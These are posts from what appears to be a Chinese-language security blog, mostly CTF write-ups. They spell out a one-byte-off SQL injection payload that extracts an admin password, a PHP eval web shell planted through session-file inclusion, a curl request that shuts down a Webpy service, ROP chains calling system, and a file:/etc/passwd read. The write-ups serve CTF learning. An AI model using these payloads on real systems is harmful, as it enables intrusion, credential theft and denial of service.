2015年9月29日 星期二

Google & Facebook Bug Bounty GET



先說這篇純粹炫耀文xD

暨 2013 年 Yahoo 開始有 Bug Bounty 那時搶個流行找了兩個漏洞回報 Yahoo 然後

就沒有然後了。之後就變成電競選手在打 CTF 了

直到今年年中,想說至少把幾間大公司的漏洞回報榜都留個名字就開始繼續挖洞

不過實際下去挖掘的時候發現差異滿大的,好挖好找嚴重性大的漏洞都已經被找走

感覺挖漏洞的藍海時代已經過惹

現在要當獎金獵人只能往比較前端跟設計上的小疏失挖掘,賺不到甚麼大錢XD

花了一點時間 survey 歷年出過的一些漏洞以及前端相關的一些攻擊手法

找到了個 Google 某官方的 CSRF 導致個人資訊洩漏以及 Facebook 某個子域名的 XSS

Google 那個比較有趣,利用起來比較類似 Watering holes exploiting JSONP hijacking to track users in China

順道一提,在寄信回報漏洞時的 PoC 還順便釣到 Google Security Team 的測試帳號
(很靠北的大頭貼XDD)





https://www.google.com/about/appsecurity/hall-of-fame/




2015年9月10日 星期四

AIS3 Final CTF Web Writeup (Race Condition & one-byte off SQL Injection)



這次為了 AIS3 Final CTF 所出的一道題目,這題在這以初新者導向中的比賽中相對難,

不過其中的觀念很有趣,在解題中什麼都給你了就是找不到洞但經人一解釋就會有豁然開朗覺得為什麼自己沒想到的感覺

在做 Web 攻擊、滲透滿多時候思路不能太正派、太直觀,要歪一點、要 "猥瑣" 一點XD


純粹 code review 直接上 code
(可以自己先嘗試一下找不找的到洞XD)



漏洞一 Race Condition

預設註冊的使用者都是會被放進 locks 表中鎖起來的,
但是只要在註冊中,帳號尚未被新增進 locks 表時(111 & 112 行) 馬上登入的話,
登入檢查是否被鎖住的限制就可以繞過了!



漏洞二 one-byte off SQL Injection

當成功登入後可以新增 note 並且可以看到自己新增的 note
漏洞發生在第 58 行,當 note 的標題太長為了畫面美觀會進行截斷的動作只限制前 32 個字顯示在畫面上

這時候因為對 SQL Injection 防護是使用 escape 的方式防護,單引號(')會被反斜線 escape 成 (\'),這時候如果精心設計一個長度正確的 payload 就可以讓防護剛好被繞過造成後面的 SQL 語句跟前方連在一起

Payload
POST=
title=phddaaphddaaphddaaphddaaphddaa_\
&note=, (select pass from users where name=0x6f72616e6765)# 
phddaaphddaaphddaaphddaaphddaa_\
(32 個字長) 
會被 escape 成 
phddaaphddaaphddaaphddaaphddaa_\\ 
(33 個字長) 
此時踩到超過 32 長的限制 (57 & 58 行),並進行截斷成 
phddaaphddaaphddaaphddaaphddaa_\

導致原本的防護被繞過,使得原本被括起來後面的單引號被 escape 原本的 SQL 語句就變成字串了

用這個方法就可以成功在 INSERT 語法中進行 SQL Injection 並在自己的 note 中看到資料,取得管理員密碼後即可變身成管理員

順道一提這個思路在 Discuz 7.2 去年還是前年被爆出的 SQL Injection 中有類似的思路



漏洞三 Local File Inclusion with PHP session

由於 include 前面不可控,所以不能使用 php://filter 或是 zip:// phar:// 等協議,而後面有 php 的後綴也不能使用 LFI with PHPINFO 的招數

不過在 PHP 中 SESSION 預設存在 /var/lib/php5/sess_* 中

Ex
Cookie: PHPSESSID=123php 會產生 /var/lib/php5/sess_123php 的檔案


在可以偽造 $_SESSION 內容的時候其實就代表可以產生一個部分內容可控,部分檔名可控的檔案,這時候在使用 LFI 去包含他就可以產生一個 shell 了

Payload
sqlpwn.php?mode=admin
&boom=../../../../var/lib/php5/sess_123
如此一來可以透過第一個漏洞註冊一個使用者名稱為 <?php eval($_POST[ccc]);?> 的用戶,
之後登入時指定 PHPSESSID 為 php 結尾,再利用所產生的 session file 進行 include 的動作。

2015年8月31日 星期一

Remote Code Execution through GDB Remote Debugging Protocol


在準備 DEFCON CTF 時額外想到的小玩具,
很多人使用 GDB remote debugging 時為了方便遠端使用,會將 port 綁在 0.0.0.0 上使得攻擊者可以連接上做一些事情

至於可以做哪些事情,不來個遠端代碼執行就不好玩了XD

大部分的工作都基於 Turning arbitrary GDBserver sessions into RCE 這篇文章,
修改部分則是加上 arm 及 x64 的支援以及把 code 改好看點....XD

比較 tricky 的部分則是 GDB 在 extended-remote 後,GDB 預設的處理器架構會是 i386
如果遠端的處理器架構非 x86 的架構下會失敗,所以必須用 set architecture 指定處理器架構
(原文章因為都在 x86 架構下所以沒這個問題XD)
但是在 run 之前無法知道所處的處理器架構所以變成一個很尷尬的狀態XD

另外一個有趣的是如何檢測掃描到的 port 是否為 GDB remote debugging protocol
送個
$?#3f
就可以判斷,接著就可以寫成 script 就可以批次掃描處理了XD

最後 PoC,在本機跑
gdbserver --remote-debug 0.0.0.0:31337 /bin/ls
配合下面 Exploit 就可以拿 shell XD

不多說,貼 code


2015年7月18日 星期六

2015 烏雲峰會演講投影片 「關於 HITCON CTF 的那些事 之 Web 狗如何在險惡的 CTF 世界中存活?」




應邀以 HITCON CTF 隊長的身份到 烏雲峰會 講一下過去比賽中遇到的一些趣事

順便解釋一下許多人好奇 HITCON 以及 217, BambooFox 的關係,

基本上就是獨立的三支隊伍
  • 217 以台大學生為主
  • BambooFox 則以交大、中央以及一些業界人士為主
  • oo at xx 由 orange, atdog, jeffxx 三人取首尾字母組合起來,其實我們三個比較偏向原本 HITCON/CHROOT 成員,但為了種種因素因而組成了這個新隊伍xD


遇到大比賽當然將戰力合併起來以 HITCON 出擊,因為人力真的不夠

而其餘時間則是各自參加比賽、各自訓練成員等

當然有時各自比賽人數不夠則會向其他隊伍借一借人來用xD


不過投影片做著做著就多了下半部分,

在烏雲以 Web 技術為主的氛圍下,剛好命名成講述 Web 狗如何在 CTF 世界生存的故事XD


2015年5月1日 星期五

講個秘訣 - 0ctf Final 0cms


這次跟著 217 到上海參加由 0ops 舉辦的 0ctf 決賽

總體來說這次是我打過最爽的一次 Attack & Defense 比賽,
尤其 0cms 這個題目滿對我胃口的,考驗快速 Code Review 找洞、快速修洞、快速寫 Exploit 打全場的能力
(好在有 web 題目可以發揮,這次沒有耍廢XDDD)

靠 0cms 刷分刷到第二天幾乎所有隊伍都放棄,把 Web 服務關掉防止失去更多分
直到比賽結束前兩三小時 Blue-Lotus 跟 Freed0m 才把服務修補好重新開啟上線XD

當中針對一個弱點有想到比較不一樣的利用方式特此紀錄一下XD

(紅色=被入侵、深黃色=服務當掉、淺黃色=服務當掉+被入侵)

0cms 是一題以 Webpy 寫的一個線上內容管理系統,配合 SQLite 以及許多個弱點
第一眼看到用到 Webpy 這個 Python framework 就想到烏雲的這篇 新型任意文件读取漏洞的研究,事後比較好像弱點那部分程式碼真的長得差不多XD
不過這次要講的不是它XD


在第 31 行 dispatcher -> __request 的地方有個可以任意引入已知檔案模組的功能
當 URL 是以 /A/B/C

可以執行到類似如下的語法
from A.B import B
B.C()
不過如果伺服器上沒有可控檔案的話幾乎不能做什麼事情
所以大部份人的玩法都是透過 CMS 本身管理功能有提供一個任意檔案上傳,透過上傳一個 .py 檔案到 action 目錄下再透過這個漏洞去執行造成 Remote Code Execution

不過當然這麼明顯的上傳當然馬上就被很多隊伍修補了,
不過任意引用的部分似乎許多隊伍認為是正常功能以及不搭配上傳無法利用所以都沒修補
所以在比賽第一天晚上花了一點時間研究這個任意引用到底還可以做到什麼樣子的利用

限制比較麻煩的是要在 A 目錄下找到 B.py 同時檔案內要有 class B 可用
兒且 A B C 都限定 a-z0-9 且呼叫 C 除了 self instance 外不能指定其他參數

看到這些限制又要可以對網站有實質影響所以最後決定看一下 Webpy 的原始碼
花了一陣子後沒發現什麼,不過在 Attack & Defense 比賽中 DoS 的洞也很有利用價值

再仔細看一下後發現
web/application.py 下有個 class application 符合條件
配合裡面的 stop 可以直接停止 WSGIServer 把別人服務給關閉XD

最後 PoC
curl http://100.64.101.154/web/application/stop

靠著這招在第二天狂刷所有隊伍XD
如此這般,不知道有沒有什麼其他更好利用的方式?


2015年4月13日 星期一

Web 狗沒人權 TAT?





花了很大力氣蒐集了許多資訊,花了幾個月模擬著可能的突破口一個個檢視
終於發現某個網路邊界有 SQL Injection 可以 Getshell 進到內網

結果被說「Web 很簡單,不就 SQL Injection ?」
......

Web終究沒人權


2015年3月2日 星期一

Boston Key Party CTF 2015 [Harvard Square] [Andrew & Broadway] Write-ups



Boston Key Party 是今年 Defcon CTF 的倒數第二場資格賽,
雖然只拿了 第二名 不過由於冠軍的 PPP 已經確定保送所以應該是可以遞補上今年 Defcon 決賽資格!!

比賽幾乎是滿滿的 Pwn 以及 Crypto 而且都是 64-bits 不過看來也是趨勢沒什麼好說的XD
有點慚愧自己 Pwn 的能力太久沒練反而都退步了趁著這次機會好好練習順便學一下想學很久的 Pwntools XD


Harvard Square (Pwn 275)

Harvard 是一個線上 Exploit 購買競標系統,ELF 64-bits with DEP

主要漏洞有兩個
  1. 當在回合內還完自己的負債(owed)以及金錢(money) > 99999999 時名字可進入至排行榜,此時會產生 Buffer Overflow ,不過依照遊戲的規則,要在有限的回合內完成似乎不太可能
  2. 程式開始時有機會輸入 Cheat Code,讀 40 個 bytes 時不過 buffer 只有 24 bytes 所以會覆蓋到 exploit_free 以及 string_free 這兩個 Function Pointer ,這兩個會在後面 gc_free 時候被引用到所以覆蓋 Function Pointer 可以有一次的任意地址跳轉

由於遊戲無法執行到好利用的 Buffer Overflow ,所以比較直觀的想法是利用覆蓋 Function Pointer 跳轉去觸發第一個漏洞

可以成功觸發漏洞後接著就是撰寫 Exploit 的部分,
程式不大加上是 x64 所以很難構造對應的 ROP,嘗試了很久才發現原來題目有提供 glibc 的 Binary ... 不過最後還是在沒有依賴它提供的 GLIBC 下完成 Exploit (否則應該可以省下一半以上的時間...)

首先 Leak Address
[AAAAAA...] + [pop rdi / ret] + [got_of_strlen] + [call puts] 

透過洩漏的地址算出 system 的地址後再進行攻擊
繼續構造
[AAAAAA...] + [pop rdi / ret] + [cmd string address] + [system_address]

這裡比較有趣的事因為 ROP gadget 很少所以想不到甚麼辦法洩漏 address 或是構造參數去 read 弄出 /bin/sh 這個字串
最後終於被我想到XD,由於是使用 system 不是 execve 所以可以不用提供絕對路徑,所以只要送個 sh 就好了,
反正在英文單字中 sh 是很常出現的字根,找個字串結尾是 "sh\x00" 的地址設過去即可!



最後附上完整的 Exploit 



Andrew & Broadway (Pwn 275 & Pwn 275)

Andrew 跟 Broadway 是一樣的題目,只是兩者的目標不同
本來是只有 Andrew 這題只是比賽途中 Andrew 被找出出題者意料外的漏洞造成不用 Shell in 就可以拿到 Flag 所以為了公平性原本的題目就維持著而加開了 Broadway 換了種方式一定得拿到 Shell 才有 Flag

Andrew 是一個編譯好的 x64 Nginx Binary,整個 Binary 很大如果慢慢看一定看不完
但由於 Nginx 編譯是用最新的版本(1.6.2),所以大致可以不用考慮 Nginx 自身的漏洞

簡單摸索一下執行檔發現執行檔在編譯的時候多編進了一個 Nginx Module 
所以大概猜這個 Module 上有記憶體相關的弱點可以拿 Shell 

整個 Module 很簡單,會對傳進來的路徑使用 curl_easy_perform 去下載後判斷類型後進行 prettify, minify, leetfy ... 等處理

正確的解法應該是要想辦法讓路徑被 curl_easy_perform 當成一個合法的 URL 去下載、存取遠端資源,接著在 minify 函數中由於使用 strlen 判斷遠端資源大小後 memory copy 所以可以在遠端資源中用 Null Byte 來繞過大小的檢查產生 Buffer Overflow

由於 Nginx 在處理路徑時的正規化,會將 Double Slash 轉成 Single Slash (http:// -> http:/)
所以這樣的 payload 會失敗
http://ATTACK_SERVER/http://MY_SERVER/payload.html
不過好玩的是,雖然 http:// 轉成 http:/ curl 會不吃,但 file:// 轉成 file:/ curl 居然會吃 ...
curl http:/MY_SERVER
curl ftp:/MY_SERVER
都會失敗但
curl file:/etc/passwd 
這種錯誤的表達方式居然會被接受XD (正確的表達方式應該是 file:///etc/passwd)
所以一出來被用這種方式繞過 Shell 拿到 Flag 後出題者只好重振旗鼓(?) 重出一題xD

新的 Broadway 題目架構一樣不過比較機車的是 Flag 位置不給你了,
所以有了任意讀檔也沒有用非得拿到 Shell 才能翻出 Flag 位置

由於需要有遠端 HTTP Server 配合所以 payload 比較凌亂放上了只給個大致流程XD

觸發漏洞皆使用
GET /MY_IP_ADDRESS:12345/payload.html# HTTP/1.0
至於 payload.html 內一樣分成兩次 Leak Address 以及執行 system

洩漏地址
[Null Byte] + [AAAAAA...] + [ROP of dup2(fd,0)] + [ROP of dup2(fd,0)] + [pop rsi / ret] + [got_of_dup2] + [write address] ...

執行指令
[command] + [Null Byte] + [pop rsi / pop r15 / ret] + [0] + [0] + [xchg eax,ebp / ret] + [pop rax / add rsp, 8  / ret]
 + [system_address] + [0] + [call eax]


最後附上這三題的 Binary 有興趣可以自己摸索XD